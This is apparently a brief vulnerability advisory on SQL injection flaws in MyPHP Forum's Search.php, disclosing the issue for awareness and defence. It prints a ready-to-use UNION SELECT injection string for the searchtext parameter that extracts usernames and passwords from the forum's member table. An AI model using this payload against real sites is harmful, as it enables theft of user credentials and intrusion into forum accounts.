|
MyPHP Forum 'Search.php' and Multiple Unspecified SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues. The following example SQL query is available: submit=Search&searchtext=%'/**/UNION/**/SELECT/**/0,0,0,concat('<BR/><h3>-=ParadoxGotThisOne=-</h3><BR/><h4>Username:',username,'<BR/>Password:',password,'</h4>'),0,0,0,0,0,0/**/FROM/**/[Prefix]_member/**/WHERE/**/uid=[Id]/*" |
|
|
Privacy Statement |